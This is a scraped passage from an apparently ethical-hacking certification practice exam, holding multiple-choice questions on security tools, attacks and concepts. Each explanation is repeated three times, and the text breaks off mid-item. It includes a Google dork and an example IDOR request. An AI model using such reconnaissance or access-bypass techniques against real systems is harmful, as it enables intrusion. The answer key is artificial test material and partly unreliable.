Metagoofil is correct. Metagoofil is an information-gathering tool designed for extracting metadata of public documents (.pdf, .doc, .xls, .ppt, .docx, .pptx, and .xlsx) belonging to a target company. Metagoofil will perform a search in Google to identify and download the documents to local disk and then will extract the metadata with different libraries such as Hachoir, PdfMiner, and others. With the results, it will generate a report with usernames, software versions, and server or machine names that will help penetration testers in the information-gathering phase.
Incorrect answers:
All other answers are incorrect. None of the remaining tools performs this task.
Question 25 of 100
25. Question
Which of the following is a command-line sniffer and packet analyzer?
Correct
Correct anser:
Tcpdump is correct. Tcpdump is a well-known sniffer that has been around forever. GUI-based sniffers—like Wireshark—are all the rage, but tcpdump has survived the test of time and still has a place in your toolset.
Incorrect answers:
Nessus is a vulnerability scanner.
Netstat will display port information on your system.
Netcat is used for maintaining access on a system (along with other things).
Incorrect
Correct anser:
Tcpdump is correct. Tcpdump is a well-known sniffer that has been around forever. GUI-based sniffers—like Wireshark—are all the rage, but tcpdump has survived the test of time and still has a place in your toolset.
Incorrect answers:
Nessus is a vulnerability scanner.
Netstat will display port information on your system.
Netcat is used for maintaining access on a system (along with other things).
Unattempted
Correct anser:
Tcpdump is correct. Tcpdump is a well-known sniffer that has been around forever. GUI-based sniffers—like Wireshark—are all the rage, but tcpdump has survived the test of time and still has a place in your toolset.
Incorrect answers:
Nessus is a vulnerability scanner.
Netstat will display port information on your system.
Netcat is used for maintaining access on a system (along with other things).
Question 26 of 100
26. Question
An attacker gains access to an internal machine. He then uses Metasploit to access and attack other internal systems from that machine. Which of the following terms describes this?
Correct
Correct answer:
Pivioting is correct. Pivoting involves using a compromised system as a launching point into other systems. After the first system is owned, the attacker can add a route statement in Metasploit to access the network beyond it.
Incorrect answers:
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Incorrect
Correct answer:
Pivioting is correct. Pivoting involves using a compromised system as a launching point into other systems. After the first system is owned, the attacker can add a route statement in Metasploit to access the network beyond it.
Incorrect answers:
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Unattempted
Correct answer:
Pivioting is correct. Pivoting involves using a compromised system as a launching point into other systems. After the first system is owned, the attacker can add a route statement in Metasploit to access the network beyond it.
Incorrect answers:
Fuzzing refers to a testing scenario aimed at applications (using random data).
Patching refers to applying released security updates.
Switching is not a term used in this area.
Question 27 of 100
27. Question
Which of the following is an attempt to resolve computer security problems through hardware enhancements and associated software modifications?
Correct
Correct answer:
Trusted computing module is correct. Trusted computing basically refers to an attempt to resolve computer security problems through hardware enhancements and associated software modifications. Roots of Trust (RoT) is a set of functions within the trusted computing module that are always trusted by the computer’s operating system.
Incorrect answers:
The Trusted Computing Group (TCG) is made up of a bunch of hardware and software providers who cooperate to come up with specific plans.
Cloud computing is irrelevant.
OSRoT is not a legitimate term.
Incorrect
Correct answer:
Trusted computing module is correct. Trusted computing basically refers to an attempt to resolve computer security problems through hardware enhancements and associated software modifications. Roots of Trust (RoT) is a set of functions within the trusted computing module that are always trusted by the computer’s operating system.
Incorrect answers:
The Trusted Computing Group (TCG) is made up of a bunch of hardware and software providers who cooperate to come up with specific plans.
Cloud computing is irrelevant.
OSRoT is not a legitimate term.
Unattempted
Correct answer:
Trusted computing module is correct. Trusted computing basically refers to an attempt to resolve computer security problems through hardware enhancements and associated software modifications. Roots of Trust (RoT) is a set of functions within the trusted computing module that are always trusted by the computer’s operating system.
Incorrect answers:
The Trusted Computing Group (TCG) is made up of a bunch of hardware and software providers who cooperate to come up with specific plans.
Cloud computing is irrelevant.
OSRoT is not a legitimate term.
Question 28 of 100
28. Question
Which firewall operates at Layer 5?
Correct
Correct answer:
Circuit level is correct. It’s true that circuit-level firewalls can and do monitor TCP handshakes (Layer 4) and that they can monitor and filter on upper-layer protocols (Application layer), but they don’t make filtering decisions based on the data within those protocols. They primarily work at the Session layer (Layer 5).
Incorrect answers:
Application-level firewalls work at Layer 7
Packet-filtering and stateful firewalls respectively at Layers 3 and 4.
Incorrect
Correct answer:
Circuit level is correct. It’s true that circuit-level firewalls can and do monitor TCP handshakes (Layer 4) and that they can monitor and filter on upper-layer protocols (Application layer), but they don’t make filtering decisions based on the data within those protocols. They primarily work at the Session layer (Layer 5).
Incorrect answers:
Application-level firewalls work at Layer 7
Packet-filtering and stateful firewalls respectively at Layers 3 and 4.
Unattempted
Correct answer:
Circuit level is correct. It’s true that circuit-level firewalls can and do monitor TCP handshakes (Layer 4) and that they can monitor and filter on upper-layer protocols (Application layer), but they don’t make filtering decisions based on the data within those protocols. They primarily work at the Session layer (Layer 5).
Incorrect answers:
Application-level firewalls work at Layer 7
Packet-filtering and stateful firewalls respectively at Layers 3 and 4.
Question 29 of 100
29. Question
Which of the following is NOT a recommended practice for malware analysis?
Correct
Correct Answer:
After static analysis, run the virus in a sparsely used portion of the network is correct.
Running a virus on your production network is dumb, dumb, dumb. When performing malware analysis, first prepare a test bed—usually a system with VMs, all shared drives disabled, and the NIC in host-only mode. After copying the virus to the test system, perform static analysis while the malware is inactive. Next, set up network connections (off production network, of course) and monitor for errors/activity. Finally, run the malware and note the processes, files added, and network activity.
Incorrect Answers:
When preparing the test bed system, disable all shared drives, B, and C are incorrect.
These are all valid steps in malware analysis.
Incorrect
Correct Answer:
After static analysis, run the virus in a sparsely used portion of the network is correct.
Running a virus on your production network is dumb, dumb, dumb. When performing malware analysis, first prepare a test bed—usually a system with VMs, all shared drives disabled, and the NIC in host-only mode. After copying the virus to the test system, perform static analysis while the malware is inactive. Next, set up network connections (off production network, of course) and monitor for errors/activity. Finally, run the malware and note the processes, files added, and network activity.
Incorrect Answers:
When preparing the test bed system, disable all shared drives, B, and C are incorrect.
These are all valid steps in malware analysis.
Unattempted
Correct Answer:
After static analysis, run the virus in a sparsely used portion of the network is correct.
Running a virus on your production network is dumb, dumb, dumb. When performing malware analysis, first prepare a test bed—usually a system with VMs, all shared drives disabled, and the NIC in host-only mode. After copying the virus to the test system, perform static analysis while the malware is inactive. Next, set up network connections (off production network, of course) and monitor for errors/activity. Finally, run the malware and note the processes, files added, and network activity.
Incorrect Answers:
When preparing the test bed system, disable all shared drives, B, and C are incorrect.
These are all valid steps in malware analysis.
Question 30 of 100
30. Question
Which cloud service type offers on-demand applications to subscribers over the Internet?
Correct
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
IaaS, PaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Incorrect
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
IaaS, PaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Unattempted
Correct Answer:
SaaS is correct.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Incorrect Answers:
IaaS, PaaS, and Hypervisor are incorrect.
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software.
Hypervisor is a term associated with the provision of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 31 of 100
31. Question
Which of the following statements is true regarding NetStumbler?
Correct
Correct answer:
NetStumbler can be installed on Windows is correct. NetStumbler is a Windows tool. It can detect wireless traffic on 802.11a, b, and g networks but not on 802.11n networks.
Incorrect answers:
All other answers are incorrect. NetStumbler can’t be installed on anything but Windows. Additionally, it doesn’t support monitor mode (used in passive scanning).
Incorrect
Correct answer:
NetStumbler can be installed on Windows is correct. NetStumbler is a Windows tool. It can detect wireless traffic on 802.11a, b, and g networks but not on 802.11n networks.
Incorrect answers:
All other answers are incorrect. NetStumbler can’t be installed on anything but Windows. Additionally, it doesn’t support monitor mode (used in passive scanning).
Unattempted
Correct answer:
NetStumbler can be installed on Windows is correct. NetStumbler is a Windows tool. It can detect wireless traffic on 802.11a, b, and g networks but not on 802.11n networks.
Incorrect answers:
All other answers are incorrect. NetStumbler can’t be installed on anything but Windows. Additionally, it doesn’t support monitor mode (used in passive scanning).
Question 32 of 100
32. Question
Which cloud service type is best designed for software development?
Correct
Correct answer:
PaaS is correct. Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Incorrect
Correct answer:
PaaS is correct. Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Unattempted
Correct answer:
PaaS is correct. Platform as a Service (PaaS) is geared toward software development because it provides a development platform that allows subscribers to develop applications without building the infrastructure it would normally take to develop and launch software. Hardware and software are hosted by the provider on its own infrastructure so customers do not have to install or build homegrown hardware and software for development work. PaaS doesn’t usually replace an organization’s actual infrastructure; instead, it just offers key services the organization may not have onsite.
Incorrect answers:
Infrastructure as a Service (IaaS) basically provides virtualized computing resources over the Internet.
Software as a Service (SaaS) is simply a software distribution model—the provider offers on-demand applications to subscribers over the Internet.
Hypervisor is a term associated with the provisioning of virtual machines (examples include VMware, Oracle VirtualBox, Xen, and KVM).
Question 33 of 100
33. Question
A hacker performs attacks because of political motivation. Which term best describes this attacker?
Correct
Correct Answer:
Hacktivist is correct.
Hackers who use their skills and talents to forward a cause or a political agenda are practicing hacktivism.
Incorrect Answers:
Script kiddie, State-sponsored hacker, and Suicide hacker are incorrect.
Script kiddies generally just copy attack codes and don’t really have much in the way of a skill set.
State-sponsored hacking is exactly what it sounds like, and a suicide hacker may indeed be a hacktivist, but he doesn’t care about being caught (unless the questions specifies this; don’t assume it).
Incorrect
Correct Answer:
Hacktivist is correct.
Hackers who use their skills and talents to forward a cause or a political agenda are practicing hacktivism.
Incorrect Answers:
Script kiddie, State-sponsored hacker, and Suicide hacker are incorrect.
Script kiddies generally just copy attack codes and don’t really have much in the way of a skill set.
State-sponsored hacking is exactly what it sounds like, and a suicide hacker may indeed be a hacktivist, but he doesn’t care about being caught (unless the questions specifies this; don’t assume it).
Unattempted
Correct Answer:
Hacktivist is correct.
Hackers who use their skills and talents to forward a cause or a political agenda are practicing hacktivism.
Incorrect Answers:
Script kiddie, State-sponsored hacker, and Suicide hacker are incorrect.
Script kiddies generally just copy attack codes and don’t really have much in the way of a skill set.
State-sponsored hacking is exactly what it sounds like, and a suicide hacker may indeed be a hacktivist, but he doesn’t care about being caught (unless the questions specifies this; don’t assume it).
Question 34 of 100
34. Question
An attacker crafts an e-mail with a link to a malicious site. He sends this e-mail to a select group of people inside the organization who would be familiar with the contents and suggestions within the e-mail. Which of the following best describes this attack?
Correct
Correct answer:
Spear phishing is correct. Spear phishing involves a little reconnaissance to define a group of folks inside an organization.
Incorrect answers:
Phishing is definitely the attack being used, but targeting the attack against a specific group makes it spear phishing.
The remaining answers do not apply here.
Incorrect
Correct answer:
Spear phishing is correct. Spear phishing involves a little reconnaissance to define a group of folks inside an organization.
Incorrect answers:
Phishing is definitely the attack being used, but targeting the attack against a specific group makes it spear phishing.
The remaining answers do not apply here.
Unattempted
Correct answer:
Spear phishing is correct. Spear phishing involves a little reconnaissance to define a group of folks inside an organization.
Incorrect answers:
Phishing is definitely the attack being used, but targeting the attack against a specific group makes it spear phishing.
The remaining answers do not apply here.
Question 35 of 100
35. Question
A pen tester gains access to a Windows application server and enters the following command: “` netsh firewall show config “` What should be displayed in return?
Correct
Correct Answer:
Settings of the built-in firewall is correct.
The netsh command can show all sorts of goodies. In this example, it is used to display the Windows firewall settings.
Incorrect Answers:
An authentication screen for firewall configuration access, Route mapping to the nearest firewall, and D are incorrect.
The remaining answers do not accurately reflect the command.
Incorrect
Correct Answer:
Settings of the built-in firewall is correct.
The netsh command can show all sorts of goodies. In this example, it is used to display the Windows firewall settings.
Incorrect Answers:
An authentication screen for firewall configuration access, Route mapping to the nearest firewall, and D are incorrect.
The remaining answers do not accurately reflect the command.
Unattempted
Correct Answer:
Settings of the built-in firewall is correct.
The netsh command can show all sorts of goodies. In this example, it is used to display the Windows firewall settings.
Incorrect Answers:
An authentication screen for firewall configuration access, Route mapping to the nearest firewall, and D are incorrect.
The remaining answers do not accurately reflect the command.
Question 36 of 100
36. Question
An attacker sees guard dogs inside the perimeter. Which of the following best describes this control effort?
Correct
Correct answer:
Physical deterrent control is correct. What can deter you more than the sight of a dog patrolling an area, just waiting for an intruder to chew on? Note the terminology here, though: “preventive” could just has easily been used as a descriptor; however, “deterrent” is usually found with the physical descriptor.
Incorrect answers:
All other answers are incorrect. Dogs aren’t technical—even smart ones. And while you can use a bloodhound as a means to track down an escapee, dogs are not detective controls.
Incorrect
Correct answer:
Physical deterrent control is correct. What can deter you more than the sight of a dog patrolling an area, just waiting for an intruder to chew on? Note the terminology here, though: “preventive” could just has easily been used as a descriptor; however, “deterrent” is usually found with the physical descriptor.
Incorrect answers:
All other answers are incorrect. Dogs aren’t technical—even smart ones. And while you can use a bloodhound as a means to track down an escapee, dogs are not detective controls.
Unattempted
Correct answer:
Physical deterrent control is correct. What can deter you more than the sight of a dog patrolling an area, just waiting for an intruder to chew on? Note the terminology here, though: “preventive” could just has easily been used as a descriptor; however, “deterrent” is usually found with the physical descriptor.
Incorrect answers:
All other answers are incorrect. Dogs aren’t technical—even smart ones. And while you can use a bloodhound as a means to track down an escapee, dogs are not detective controls.
Question 37 of 100
37. Question
Bill is asked to perform an assessment but is provided with no knowledge of the system other than the name of the organization. Which of the following best describes the test he will be performing?
Correct
Correct answer:
Black box is correct. While there may be some argument about the real-world version of a black-box test, as far as your exam goes, it is an assessment without any knowledge provided about the target.
Incorrect answers:
White-box and gray-box tests both provide information about the target (white is all of it; gray is some of it).
Incorrect
Correct answer:
Black box is correct. While there may be some argument about the real-world version of a black-box test, as far as your exam goes, it is an assessment without any knowledge provided about the target.
Incorrect answers:
White-box and gray-box tests both provide information about the target (white is all of it; gray is some of it).
Unattempted
Correct answer:
Black box is correct. While there may be some argument about the real-world version of a black-box test, as far as your exam goes, it is an assessment without any knowledge provided about the target.
Incorrect answers:
White-box and gray-box tests both provide information about the target (white is all of it; gray is some of it).
Question 38 of 100
38. Question
You are offering your team’s pen test services to a potential client. The customer reviews things and seems unconvinced a manual pen test will be helpful in securing their systems. Which of the following should you do as an ethical hacker and representative of your team?
Correct
Correct answer:
Bring statistical information to the table, showing the risks of poor network security as well as the use of pen testing by industry and government agencies alike is correct. Ethically, this is the only choice that makes any sense. You can’t do anything without an agreement in place first, and it’s your job to convince the potential client they need it.
Incorrect answers
All other answers are incorrect. Each of these answers—although funny and providing some satisfaction for the “See, I told you so!” crowd among us—is highly unethical.
Incorrect
Correct answer:
Bring statistical information to the table, showing the risks of poor network security as well as the use of pen testing by industry and government agencies alike is correct. Ethically, this is the only choice that makes any sense. You can’t do anything without an agreement in place first, and it’s your job to convince the potential client they need it.
Incorrect answers
All other answers are incorrect. Each of these answers—although funny and providing some satisfaction for the “See, I told you so!” crowd among us—is highly unethical.
Unattempted
Correct answer:
Bring statistical information to the table, showing the risks of poor network security as well as the use of pen testing by industry and government agencies alike is correct. Ethically, this is the only choice that makes any sense. You can’t do anything without an agreement in place first, and it’s your job to convince the potential client they need it.
Incorrect answers
All other answers are incorrect. Each of these answers—although funny and providing some satisfaction for the “See, I told you so!” crowd among us—is highly unethical.
Question 39 of 100
39. Question
What is the primary difference between S/MIME and PGP?
Correct
Correct Answer:
PGP can be used to encrypt hard drives, but S/MIME cannot is correct.
Pretty Good Privacy (PGP) can handle a lot more than e-mail, and that is one of the primary differences between it and S/MIME (Secure/Multipurpose Internet Mail Extensions). PGP is an application, whereas S/MIME is a protocol.
Incorrect Answers:
PGP uses SHA-1 for integrity, S/MIME can encrypt e-mail, but PGP can’t, and S/MIME uses RSA for digital signatures are incorrect.
The remaining choices are not true regarding either PGP or S/MIME.
Incorrect
Correct Answer:
PGP can be used to encrypt hard drives, but S/MIME cannot is correct.
Pretty Good Privacy (PGP) can handle a lot more than e-mail, and that is one of the primary differences between it and S/MIME (Secure/Multipurpose Internet Mail Extensions). PGP is an application, whereas S/MIME is a protocol.
Incorrect Answers:
PGP uses SHA-1 for integrity, S/MIME can encrypt e-mail, but PGP can’t, and S/MIME uses RSA for digital signatures are incorrect.
The remaining choices are not true regarding either PGP or S/MIME.
Unattempted
Correct Answer:
PGP can be used to encrypt hard drives, but S/MIME cannot is correct.
Pretty Good Privacy (PGP) can handle a lot more than e-mail, and that is one of the primary differences between it and S/MIME (Secure/Multipurpose Internet Mail Extensions). PGP is an application, whereas S/MIME is a protocol.
Incorrect Answers:
PGP uses SHA-1 for integrity, S/MIME can encrypt e-mail, but PGP can’t, and S/MIME uses RSA for digital signatures are incorrect.
The remaining choices are not true regarding either PGP or S/MIME.
Question 40 of 100
40. Question
An employee’s cell phone begins receiving unsolicited messages. Which Bluetooth attack is being exploited?
Correct
Correct answer:
Bluejacking is correct. Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Incorrect answers:
Bluesmacking is a DoS attack.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Bluescarfing is the actual theft of data from a Bluetooth device.
Incorrect
Correct answer:
Bluejacking is correct. Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Incorrect answers:
Bluesmacking is a DoS attack.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Bluescarfing is the actual theft of data from a Bluetooth device.
Unattempted
Correct answer:
Bluejacking is correct. Bluejacking is a Bluetooth attack where the attacker sends unsolicited messages to the target.
Incorrect answers:
Bluesmacking is a DoS attack.
Bluesniffing is an effort to sniff data from Bluetooth exchanges.
Bluescarfing is the actual theft of data from a Bluetooth device.
Question 41 of 100
41. Question
What is the MAC address in broadcast frames?
Correct
Correct Answer:
FF:FF:FF:FF:FF:FF is correct.
The MAC address for broadcast frames is made up of all Fs.
Incorrect Answers:
AA:AA:AA:AA:AA:AA, 11:11:11:11:11:11, and 99:99:99:99:99:99 are incorrect.
None of the remaining MAC addresses fits the question.
Incorrect
Correct Answer:
FF:FF:FF:FF:FF:FF is correct.
The MAC address for broadcast frames is made up of all Fs.
Incorrect Answers:
AA:AA:AA:AA:AA:AA, 11:11:11:11:11:11, and 99:99:99:99:99:99 are incorrect.
None of the remaining MAC addresses fits the question.
Unattempted
Correct Answer:
FF:FF:FF:FF:FF:FF is correct.
The MAC address for broadcast frames is made up of all Fs.
Incorrect Answers:
AA:AA:AA:AA:AA:AA, 11:11:11:11:11:11, and 99:99:99:99:99:99 are incorrect.
None of the remaining MAC addresses fits the question.
Question 42 of 100
42. Question
Which virus type overwrites otherwise empty areas within a file?
Correct
Correct answer:
Cavity is correct. One thing all malware writers attempt to do is find ways to hide their work. By finding empty spaces in a file and writing to them, a cavity virus can infect a file and not change its size so far as the system is concerned.
Incorrect answers:
Polymorphic viruses try mutating themselves to avoid detection.
Macro viruses use macros built in to various programs (such as Microsoft Excel). A boot sector virus is exceedingly difficult to get rid of and, obviously, installs on the boot sector of the disk.
Incorrect
Correct answer:
Cavity is correct. One thing all malware writers attempt to do is find ways to hide their work. By finding empty spaces in a file and writing to them, a cavity virus can infect a file and not change its size so far as the system is concerned.
Incorrect answers:
Polymorphic viruses try mutating themselves to avoid detection.
Macro viruses use macros built in to various programs (such as Microsoft Excel). A boot sector virus is exceedingly difficult to get rid of and, obviously, installs on the boot sector of the disk.
Unattempted
Correct answer:
Cavity is correct. One thing all malware writers attempt to do is find ways to hide their work. By finding empty spaces in a file and writing to them, a cavity virus can infect a file and not change its size so far as the system is concerned.
Incorrect answers:
Polymorphic viruses try mutating themselves to avoid detection.
Macro viruses use macros built in to various programs (such as Microsoft Excel). A boot sector virus is exceedingly difficult to get rid of and, obviously, installs on the boot sector of the disk.
Question 43 of 100
43. Question
Internet attackers—state-sponsored or otherwise—often discover vulnerabilities in a service or product but keep the information quiet and to themselves, thus ensuring the vendor is unaware of the vulnerability until the attackers are ready to launch an exploit. Which of the following best describes this?
Correct
Correct Answer:
Zero-day attack is correct.
A zero-day attack is one carried out on a vulnerability the good guys didn’t even know existed. The true horror of such attacks is that you do not known about the vulnerability until it’s far too late.
Incorrect Answers:
Zero-hour attack, No-day attack, and Nada-sum attack are incorrect.
The remaining answers are not legitimate terms.
Incorrect
Correct Answer:
Zero-day attack is correct.
A zero-day attack is one carried out on a vulnerability the good guys didn’t even know existed. The true horror of such attacks is that you do not known about the vulnerability until it’s far too late.
Incorrect Answers:
Zero-hour attack, No-day attack, and Nada-sum attack are incorrect.
The remaining answers are not legitimate terms.
Unattempted
Correct Answer:
Zero-day attack is correct.
A zero-day attack is one carried out on a vulnerability the good guys didn’t even know existed. The true horror of such attacks is that you do not known about the vulnerability until it’s far too late.
Incorrect Answers:
Zero-hour attack, No-day attack, and Nada-sum attack are incorrect.
The remaining answers are not legitimate terms.
Question 44 of 100
44. Question
In a discussion about biometric authentication systems, you mention a circumstance where legitimate users are denied access because of a system error or inaccurate readings. What is the correct term for this circumstance?
Correct
Correct answer:
False negative is correct. A false negative occurs when a user is denied access even though he is a legitimate user.
Incorrect answers:
A false positive occurs when a user is allowed access when he is not legitimate.
False acceptance rate and crossover error rate are both measurements of the overall accuracy of biometrics.
Incorrect
Correct answer:
False negative is correct. A false negative occurs when a user is denied access even though he is a legitimate user.
Incorrect answers:
A false positive occurs when a user is allowed access when he is not legitimate.
False acceptance rate and crossover error rate are both measurements of the overall accuracy of biometrics.
Unattempted
Correct answer:
False negative is correct. A false negative occurs when a user is denied access even though he is a legitimate user.
Incorrect answers:
A false positive occurs when a user is allowed access when he is not legitimate.
False acceptance rate and crossover error rate are both measurements of the overall accuracy of biometrics.
Question 45 of 100
45. Question
A colleague enters the following into a Google search string: “` intitle:intranet inurl:intranet +intext:”finance” “` Which of the following statements is most correct concerning this attempt?
Correct
Correct answer:
The search engine will respond with only those pages having the word “intranet” in the title and URL and with “finance” in the text is correct. Google search operators can be combined to get really sneaky. In this example, we’re looking for an internal page (“intranet” in title and URL) possibly containing finance data.
Incorrect answers:
All other answers are incorrect. Google hack operators can be combined. The operator does not say to look for finance in the URL; rather, it specifically states that this should be looked for in the text of the page, and there is more to the operation string than just “intranet” in the URL and title.
Incorrect
Correct answer:
The search engine will respond with only those pages having the word “intranet” in the title and URL and with “finance” in the text is correct. Google search operators can be combined to get really sneaky. In this example, we’re looking for an internal page (“intranet” in title and URL) possibly containing finance data.
Incorrect answers:
All other answers are incorrect. Google hack operators can be combined. The operator does not say to look for finance in the URL; rather, it specifically states that this should be looked for in the text of the page, and there is more to the operation string than just “intranet” in the URL and title.
Unattempted
Correct answer:
The search engine will respond with only those pages having the word “intranet” in the title and URL and with “finance” in the text is correct. Google search operators can be combined to get really sneaky. In this example, we’re looking for an internal page (“intranet” in title and URL) possibly containing finance data.
Incorrect answers:
All other answers are incorrect. Google hack operators can be combined. The operator does not say to look for finance in the URL; rather, it specifically states that this should be looked for in the text of the page, and there is more to the operation string than just “intranet” in the URL and title.
Question 46 of 100
46. Question
Which of the following tools can be used in IPSec VPN scanning and fingerprinting?
Correct
Correct answer:
IKE-scan is correct. IKE-scan is an IPSec VPN scanning, fingerprinting, and testing tool.
Incorrect answers:
Wireshark is used for packet capture and sniffing.
Nikto and Black Widow are both involved in web server examination and testing.
ARPwatch is not applicable here.
Incorrect
Correct answer:
IKE-scan is correct. IKE-scan is an IPSec VPN scanning, fingerprinting, and testing tool.
Incorrect answers:
Wireshark is used for packet capture and sniffing.
Nikto and Black Widow are both involved in web server examination and testing.
ARPwatch is not applicable here.
Unattempted
Correct answer:
IKE-scan is correct. IKE-scan is an IPSec VPN scanning, fingerprinting, and testing tool.
Incorrect answers:
Wireshark is used for packet capture and sniffing.
Nikto and Black Widow are both involved in web server examination and testing.
ARPwatch is not applicable here.
Question 47 of 100
47. Question
Angie waits by a side door and follows a group of employees inside. She has no visible badge of any kind. Which of the following best describes this action?
Correct
Correct answers:
Piggybacking is correct. If the attacker is not carrying a badge—real or fake—the correct definition is piggybacking.
Incorrect answers:
Tailgating involves the use of a badge (real or fake) when following employees in through an open door.
Surfing and reverse SE have nothing to do with this topic.
Incorrect
Correct answers:
Piggybacking is correct. If the attacker is not carrying a badge—real or fake—the correct definition is piggybacking.
Incorrect answers:
Tailgating involves the use of a badge (real or fake) when following employees in through an open door.
Surfing and reverse SE have nothing to do with this topic.
Unattempted
Correct answers:
Piggybacking is correct. If the attacker is not carrying a badge—real or fake—the correct definition is piggybacking.
Incorrect answers:
Tailgating involves the use of a badge (real or fake) when following employees in through an open door.
Surfing and reverse SE have nothing to do with this topic.
Question 48 of 100
48. Question
Ethical hacker Brad is testing insecure direct object reference. He attempts to gain account access to resources under a username he discovered called Joe. Which of the following best demonstrates an attempt to exploit the insecure direct object reference?
Correct
Correct answer:
GET /restricted/accounts/?name=Joe HTTP/1.1 Host: somebank.com is correct. Of the choices provided, this is the only one that attempts direct access to Joe’s account. The following is from OWASP’s page on the subject: “Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw.” An attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for.
Incorrect answers:
All other answers are incorrect. These attempts do not attempt direct access to Joe’s account.
Incorrect
Correct answer:
GET /restricted/accounts/?name=Joe HTTP/1.1 Host: somebank.com is correct. Of the choices provided, this is the only one that attempts direct access to Joe’s account. The following is from OWASP’s page on the subject: “Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw.” An attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for.
Incorrect answers:
All other answers are incorrect. These attempts do not attempt direct access to Joe’s account.
Unattempted
Correct answer:
GET /restricted/accounts/?name=Joe HTTP/1.1 Host: somebank.com is correct. Of the choices provided, this is the only one that attempts direct access to Joe’s account. The following is from OWASP’s page on the subject: “Applications frequently use the actual name or key of an object when generating web pages. Applications don’t always verify the user is authorized for the target object. This results in an insecure direct object reference flaw.” An attacker, who is an authorized system user, simply changes a parameter value that directly refers to a system object to another object the user isn’t authorized for.
Incorrect answers:
All other answers are incorrect. These attempts do not attempt direct access to Joe’s account.
Question 49 of 100
49. Question
Which of the following provides a means to discover an organization’s restricted URLs and possibly OS information from selected targets?
Correct
Correct answer:
netcraft is correct. Netcraft has been around for a while and is highlighted repeatedly by ECC. It can be used to discover restricted URLs and to fingerprint OS information.
Incorrect answers:
Neither nmap nor whois provides the means to discover restricted URLs.
Facebook is absurd as a response.
Incorrect
Correct answer:
netcraft is correct. Netcraft has been around for a while and is highlighted repeatedly by ECC. It can be used to discover restricted URLs and to fingerprint OS information.
Incorrect answers:
Neither nmap nor whois provides the means to discover restricted URLs.
Facebook is absurd as a response.
Unattempted
Correct answer:
netcraft is correct. Netcraft has been around for a while and is highlighted repeatedly by ECC. It can be used to discover restricted URLs and to fingerprint OS information.
Incorrect answers:
Neither nmap nor whois provides the means to discover restricted URLs.
Facebook is absurd as a response.
Question 50 of 100
50. Question
A user is signed into his bank’s website and is reviewing his online banking accounts. While the browser session is open, he receives an e-mail containing a link to a news story. He clicks the link and, after reading the story, closes the browser. Within a couple of hours his bank contacts him to verify a transfer of funds from his account. Which of the following attacks most likely occurred?
Correct
Correct answer:
CSRF is correct. OWASP defines CSRF (cross-site request forgery) as a type of attack that occurs when a malicious website, e-mail, blog, instant message, or program causes a user’s web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. The idea is simple, and the results are extraordinarily evil: take over an already-authenticated web session and have the victim’s browser send messages for you.
Incorrect answers:
All other answers are incorrect. These attacks do not match the scenario given.
Incorrect
Correct answer:
CSRF is correct. OWASP defines CSRF (cross-site request forgery) as a type of attack that occurs when a malicious website, e-mail, blog, instant message, or program causes a user’s web browser to perform an unwanted action on a trusted site for which the user is currently authenticated. The idea is simple, and the results are extraordinarily evil: take over an already-authenticated web session and have the victim’s browser send messages for you.
Incorrect answers:
All other answers are incorrect. These attacks do not match the scenario given.
Unattempted
Correct answer:
